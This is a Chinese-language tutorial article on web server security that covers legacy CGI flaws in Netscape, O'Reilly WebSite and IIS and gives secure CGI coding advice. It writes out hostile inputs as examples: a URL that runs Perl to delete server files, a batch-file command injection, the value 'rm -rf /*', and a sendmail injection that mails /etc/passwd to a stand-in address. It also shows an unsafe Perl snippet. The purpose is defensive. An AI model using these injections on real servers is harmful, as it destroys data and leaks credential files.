Web安全技術與防火墻
Web安全技術與防火墻
計算機的安全性歷來都是人們討論的主要話題之一。而計算機安全 主要研 究的是計算機病毒的防治和系統的安全。下面是學習啦小編跟大家分享的是Web安全技術與防火墻,歡迎大家來閱讀學習。
Web安全技術與防火墻
步驟/方法
Perl解釋器的漏洞
Netscape Communications Server中無法識別cgi-bin下的擴展名 及其應 用關系,如:.pl是PERL的代碼程序自動調用 perl.exe文件解 釋,即使現在也只 能把perl.exe文件存放在cgi-bin目錄之下。執行 如: /cgi-bin/perl.exe?&my_script.pl. 但是這就給任何人都有執行 perl 的可能, 當有些人在其瀏覽器的URL中加上如: /cgi-bin/perl.exe?&-e+unlink+%3C*%3E 時,有可能造成刪除服務器當 前目錄下文件的危險。但是,其他如:O'Reilly WebSite或Purveyor都 不存在這種漏洞。
〖2〗CGI執行批處理文件的漏洞
文件名:test.bat:
@echo off
echo Content-type: text/plain
echo
echo Hello World!
如果客戶瀏覽器的URL為:/cgi-bin/test.bat?&dir則執行調用命 令解釋 器完成dir列表。這給訪問者有執行其他命令可能性。
2)O'Reilly WebSite server for Windows NT/95
在WebSite1.1B以前的版本中使用配處理文件存在著Netscape同樣 的漏洞, 但是,新版關閉.bat在cgi中的作用。支持perl,VB和C作為CGI 開發工具。至于 他的安全問題參看: http://website.ora.com/devcomer/secalert1。
3)Microsoft's IIS Web Server
在96年3月5日前的IIS在NT下的.bat CGI的 bug甚至比其他更嚴 重,可以 任意使用command命令。但之后修補該漏洞。你可檢查你的可 執行文件的建立日 期。IIS3.0還存在一些安全bug,主要是cgi-bin下的 覆給權利。
另外,許多 WEB服務器本身都存在一些安全上的漏洞,都是在版本 升級過 程不斷更新。在這就不一一列舉。
從CGI編程角度考慮安全:
1〕采用編譯語言比解釋語言會更安全些,并且 CGI程序應放在獨 立于HTML 存放目錄之外的CGI-BIN下,是為了防止一些非法訪問者從瀏覽 器端取得解釋性語 言的原代碼后從中尋找漏洞。
2〕在用C來編寫CGI程序時盡量少用popen(), system()和所有涉 及/bin/sh 的shell命令。在Perl中system(), exec(), open(),eval() 等exec或eval之類命 令。在由用戶填寫的form還回cgi時,不要直接調 用system()之類函數。這是為避 免當填寫內容為“rm -rf /*”或 “/usr/lib/sendmail nobody@nowhere.com; mail badguys@hell.org< /etc/passwd”之類內容。
3〕用Perl編寫CGI時如:
$mail_to = &get_name_from_input;
open (MAIL,"| /usr/lib/sendmail $mail_to");
print MAIL "To: $mailto\nFrom: me\n\nHi there!\n";
close MAIL;
該小程序是把客戶瀏覽器的form到服務器的mail處理程序。
Web安全技術與防火墻相關文章: